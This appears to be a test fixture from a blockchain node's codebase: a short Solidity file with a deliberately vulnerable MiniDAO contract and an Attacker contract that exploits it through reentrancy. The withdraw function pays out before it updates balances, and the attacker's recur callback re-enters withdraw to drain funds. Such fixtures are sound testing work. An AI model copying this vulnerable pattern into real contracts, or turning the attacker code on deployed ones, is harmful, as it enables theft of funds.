github.com/iotexproject/iotex-core@v1.14.1-rc1/action/protocol/execution/testdata-shanghai/reentry-attack.sol (about) 1 // SPDX-License-Identifier: GPL-3.0 2 3 pragma solidity ^0.8.14; 4 5 contract MiniDAO { 6 mapping(address => uint256) balances; 7 8 function deposit() public payable { 9 balances[msg.sender] += msg.value; 10 } 11 12 function withdraw(uint256 amount) public { 13 if (balances[msg.sender] < amount) revert(); 14 //msg.sender.send(amount); 15 msg.sender.call{value: amount}(abi.encodeWithSignature("recur()")); 16 balances[msg.sender] -= amount; 17 } 18 } 19 20 contract Attacker { 21 // limit the recursive calls to prevent out-of-gas error 22 uint256 stack = 0; 23 uint256 constant stackLimit = 3; 24 uint256 amount; 25 MiniDAO dao; 26 27 constructor(address daoAddress) payable { 28 dao = MiniDAO(daoAddress); 29 amount = msg.value / 10; 30 dao.deposit{value: msg.value}(); 31 } 32 33 function attack() public { 34 dao.withdraw(amount); 35 } 36 37 function recur() public payable { 38 if (stack++ < stackLimit) { 39 dao.withdraw(amount); 40 } 41 } 42 }